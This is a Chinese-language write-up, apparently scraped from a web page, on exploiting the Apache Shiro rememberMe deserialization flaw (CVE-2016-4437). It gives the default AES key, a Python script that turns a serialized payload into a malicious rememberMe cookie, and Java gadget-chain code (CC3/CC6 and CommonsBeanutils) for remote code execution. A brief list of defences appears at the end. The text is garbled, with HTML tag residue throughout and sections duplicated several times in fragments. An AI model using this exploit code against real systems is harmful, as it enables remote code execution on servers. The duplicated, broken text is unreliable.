Shiro反序列化漏洞分析与利用<\/h1>

1. Shiro550漏洞分析<\/h2>

1.1 漏洞原理<\/h3>
Shiro550漏洞(CVE-2016-4437)是Apache Shiro框架中的一个反序列化漏洞，主要存在于rememberMe功能中。攻击者可以通过构造恶意的序列化数据，利用Shiro的默认密钥进行加密，最终实现远程代码执行。<\/p>

1.2 漏洞利用流程<\/h3>

特征识别<\/strong>：在流量中查找rememberMe<\/code>字段<\/li>

加密流程分析<\/strong>：用户信息 → 序列化 → AES加密 → Base64编码<\/li> <\/ul> <\/li> 反序列化触发点<\/strong>： CookieRememberMe<\/code>类的rememberSerializedIdentity<\/code>方法<\/li> AbstractRememberMeManager<\/code>类的rememberIdentity<\/code>方法<\/li> convertPrincipalsToBytes<\/code>方法进行加密<\/li> <\/ul> <\/li> <\/ol> 1.3 加密方式<\/h3> Shiro使用AES加密，默认密钥为kPH+bIxk5D2deZiIxcaaaA==<\/code>，加密模式为CBC，使用随机IV。<\/p> 1.4 利用代码示例<\/h3> import<\/span> sys <\/span><\/span>import<\/span> base64 <\/span><\/span>import<\/span> uuid <\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span> <\/span><\/span>def<\/span> encode_rememberme<\/span>(file_path): <\/span><\/span> with<\/span> open(file_path, 'rb'<\/span>) as<\/span> f: <\/span><\/span> file_body =<\/span> f.<\/span>read() <\/span><\/span> <\/span><\/span> BS =<\/span> AES.<\/span>block_size <\/span><\/span> pad =<\/span> lambda<\/span> s: s +<\/span> ((BS -<\/span> len(s) %<\/span> BS) *<\/span> chr(BS -<\/span> len(s) %<\/span> BS)).<\/span>encode() <\/span><\/span> <\/span><\/span> key =<\/span> "kPH+bIxk5D2deZiIxcaaaA=="<\/span> <\/span><\/span> mode =<\/span> AES.<\/span>MODE_CBC <\/span><\/span> iv =<\/span> uuid.<\/span>uuid4().<\/span>bytes <\/span><\/span> <\/span><\/span> encryptor =<\/span> AES.<\/span>new(base64.<\/span>b64decode(key), mode, iv) <\/span><\/span> padded_data =<\/span> pad(file_body) <\/span><\/span> encrypted_data =<\/span> encryptor.<\/span>encrypt(padded_data) <\/span><\/span> base64_ciphertext =<\/span> base64.<\/span>b64encode(iv +<\/span> encrypted_data) <\/span><\/span> <\/span><\/span> return<\/span> base64_ciphertext <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>: <\/span><\/span> if<\/span> len(sys.<\/span>argv) !=<\/span> 2<\/span>: <\/span><\/span> print("Usage: python <script_name> <file_path>"<\/span>) <\/span><\/span> sys.<\/span>exit(1<\/span>) <\/span><\/span> <\/span><\/span> file_path =<\/span> sys.<\/span>argv[1<\/span>] <\/span><\/span> payload =<\/span> encode_rememberme(file_path) <\/span><\/span> print("rememberMe=<\/span>{}<\/span>"<\/span>.<\/span>format(payload.<\/span>decode())) <\/span><\/span><\/code><\/pre>2. Shiro-CommonsCollections3链RCE<\/h2> 2.1 问题分析<\/h3> 由于Shiro 1.2.4自身没有CommonCollections类，且Tomcat的类加载器无法加载数组类([Lorg.apache.commons.collections.Transformer;<\/code>)，需要构造不使用Transformer数组的利用链。<\/p> 2.2 解决方案<\/h3> 结合CC3和CC6链：<\/p> 使用CC3的sink点：TemplatesImpl<\/code><\/li> 使用CC2的InvokeTransformer.newTransformer<\/code><\/li> 使用CC6的HashMap<\/code>触发<\/li> <\/ol> 2.3 关键代码<\/h3> \/\/ 1. 构造TemplatesImpl <\/span><\/span><\/span><\/span>final<\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span> <\/span><\/span>\/\/ 设置_name、_bytecodes等字段 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 2. 创建InvokerTransformer触发newTransformer方法 <\/span><\/span><\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> new<\/span> Class[]{},<\/span> new<\/span> Object[]{});<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 使用CC6的触发方式 <\/span><\/span><\/span><\/span>final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>final<\/span> Map lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span> <\/span><\/span>final<\/span> TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazymap,<\/span> templates);<\/span> <\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>map2.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span> "bbb"<\/span>);<\/span> <\/span><\/span>lazymap.<\/span>remove<\/span>(<\/span>templates);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 通过反射设置factory字段 <\/span><\/span><\/span><\/span>Class lazymapClass =<\/span> LazyMap.<\/span>class<\/span>;<\/span> <\/span><\/span>final<\/span> Field factory =<\/span> lazymapClass.<\/span>getDeclaredField<\/span>(<\/span>"factory"<\/span>);<\/span> <\/span><\/span>factory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>factory.<\/span>set<\/span>(<\/span>lazymap,<\/span> invokerTransformer);<\/span> <\/span><\/span><\/code><\/pre>3. 无依赖ShiroCB链<\/h2> 3.1 原理<\/h3> 利用Shiro默认包含的CommonBeanutils(简称CB)依赖，通过PropertyUtils.getProperty<\/code>调用TemplatesImpl<\/code>的getOutputProperties<\/code>方法。<\/p> 3.2 利用链构造<\/h3> 使用BeanComparator<\/code>调用getProperty<\/code>方法<\/li> 结合PriorityQueue<\/code>触发比较操作<\/li> 避免直接依赖CommonCollections<\/li> <\/ol> 3.3 完整代码<\/h3> import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;<\/span> <\/span><\/span>import<\/span> org.apache.commons.beanutils.BeanComparator;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections4.comparators.TransformingComparator;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections4.functors.ConstantTransformer;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span> <\/span><\/span>import<\/span> java.nio.file.Files;<\/span> <\/span><\/span>import<\/span> java.nio.file.Paths;<\/span> <\/span><\/span>import<\/span> java.util.PriorityQueue;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> ShiroCB<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 构造TemplatesImpl <\/span><\/span><\/span><\/span> final<\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span> <\/span><\/span> \/\/ 设置_name、_bytecodes等字段 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 使用BeanComparator <\/span><\/span><\/span><\/span> final<\/span> BeanComparator beanComparator =<\/span> new<\/span> BeanComparator(<\/span>"outputProperties"<\/span>,<\/span> new<\/span> AttrCompare());<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造PriorityQueue <\/span><\/span><\/span><\/span> final<\/span> TransformingComparator transformingComparator =<\/span> new<\/span> TransformingComparator(<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span> <\/span><\/span> final<\/span> PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue<>(<\/span>transformingComparator);<\/span> <\/span><\/span> priorityQueue.<\/span>add<\/span>(<\/span>templates);<\/span> <\/span><\/span> priorityQueue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 通过反射修改comparator <\/span><\/span><\/span><\/span> final<\/span> Class<<\/span>PriorityQueue><\/span> priorityQueueClass =<\/span> PriorityQueue.<\/span>class<\/span>;<\/span> <\/span><\/span> final<\/span> Field comparatorField =<\/span> priorityQueueClass.<\/span>getDeclaredField<\/span>(<\/span>"comparator"<\/span>);<\/span> <\/span><\/span> comparatorField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> comparatorField.<\/span>set<\/span>(<\/span>priorityQueue,<\/span> beanComparator);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化 <\/span><\/span><\/span><\/span> serialize(<\/span>priorityQueue);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"shiroCB.ser"<\/span>));<\/span> <\/span><\/span> objectOutputStream.<\/span>writeObject<\/span>(<\/span>obj);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. 关键知识点总结<\/h2> Shiro反序列化流程<\/strong>：<\/p> 序列化 → AES加密 → Base64编码<\/li> 默认密钥kPH+bIxk5D2deZiIxcaaaA==<\/code><\/li> <\/ul> <\/li> Tomcat类加载机制<\/strong>：<\/p> 无法加载数组类([Lorg.apache.commons.collections.Transformer;<\/code>)<\/li> Class.forName<\/code>会解析数组，ClassLoader<\/code>不会<\/li> <\/ul> <\/li> 利用链选择<\/strong>：<\/p> 无CC依赖时使用URLDNS链进行探测<\/li> 有CC依赖时结合CC3和CC6链<\/li> 无CC依赖时使用CB链<\/li> <\/ul> <\/li> 防御措施<\/strong>：<\/p> 升级Shiro版本<\/li> 修改默认密钥<\/li> 禁用rememberMe功能<\/li> <\/ul> <\/li> 调试技巧<\/strong>：<\/p> 关注AbstractRememberMeManager<\/code>类的解密和反序列化过程<\/li> 注意类加载失败的报错信息<\/li> 使用反射修改关键字段绕过限制<\/li> <\/ul> <\/li> <\/ol> 通过深入理解这些原理和技术细节，可以更好地分析和利用Shiro反序列化漏洞，同时也为防御此类漏洞提供了理论基础。<\/p>

Shiro反序列化漏洞分析与利用<\/h1>

1. Shiro550漏洞分析<\/h2>

1.1 漏洞原理<\/h3>
Shiro550漏洞(CVE-2016-4437)是Apache Shiro框架中的一个反序列化漏洞，主要存在于rememberMe功能中。攻击者可以通过构造恶意的序列化数据，利用Shiro的默认密钥进行加密，最终实现远程代码执行。<\/p>

1.3 加密方式<\/h3>
Shiro使用AES加密，默认密钥为`kPH+bIxk5D2deZiIxcaaaA==<\/code>，加密模式为CBC，使用随机IV。<\/p>`

2. Shiro-CommonsCollections3链RCE<\/h2>

2.1 问题分析<\/h3>
由于Shiro 1.2.4自身没有CommonCollections类，且Tomcat的类加载器无法加载数组类(`[Lorg.apache.commons.collections.Transformer;<\/code>)，需要构造不使用Transformer数组的利用链。<\/p>`

3. 无依赖ShiroCB链<\/h2>

3.1 原理<\/h3>
利用Shiro默认包含的CommonBeanutils(简称CB)依赖，通过`PropertyUtils.getProperty<\/code>调用TemplatesImpl<\/code>的getOutputProperties<\/code>方法。<\/p>`

Shiro反序列化漏洞分析与利用<\/h1>

1. Shiro550漏洞分析<\/h2>

1.1 漏洞原理<\/h3> Shiro550漏洞(CVE-2016-4437)是Apache Shiro框架中的一个反序列化漏洞，主要存在于rememberMe功能中。攻击者可以通过构造恶意的序列化数据，利用Shiro的默认密钥进行加密，最终实现远程代码执行。<\/p>

1.3 加密方式<\/h3> Shiro使用AES加密，默认密钥为kPH+bIxk5D2deZiIxcaaaA==<\/code>，加密模式为CBC，使用随机IV。<\/p>

2. Shiro-CommonsCollections3链RCE<\/h2>

2.1 问题分析<\/h3> 由于Shiro 1.2.4自身没有CommonCollections类，且Tomcat的类加载器无法加载数组类([Lorg.apache.commons.collections.Transformer;<\/code>)，需要构造不使用Transformer数组的利用链。<\/p>

3. 无依赖ShiroCB链<\/h2>

3.1 原理<\/h3> 利用Shiro默认包含的CommonBeanutils(简称CB)依赖，通过PropertyUtils.getProperty<\/code>调用TemplatesImpl<\/code>的getOutputProperties<\/code>方法。<\/p>

1.1 漏洞原理<\/h3>
Shiro550漏洞(CVE-2016-4437)是Apache Shiro框架中的一个反序列化漏洞，主要存在于rememberMe功能中。攻击者可以通过构造恶意的序列化数据，利用Shiro的默认密钥进行加密，最终实现远程代码执行。<\/p>

1.3 加密方式<\/h3>
Shiro使用AES加密，默认密钥为`kPH+bIxk5D2deZiIxcaaaA==<\/code>，加密模式为CBC，使用随机IV。<\/p>`

2.1 问题分析<\/h3>
由于Shiro 1.2.4自身没有CommonCollections类，且Tomcat的类加载器无法加载数组类(`[Lorg.apache.commons.collections.Transformer;<\/code>)，需要构造不使用Transformer数组的利用链。<\/p>`

3.1 原理<\/h3>
利用Shiro默认包含的CommonBeanutils(简称CB)依赖，通过`PropertyUtils.getProperty<\/code>调用TemplatesImpl<\/code>的getOutputProperties<\/code>方法。<\/p>`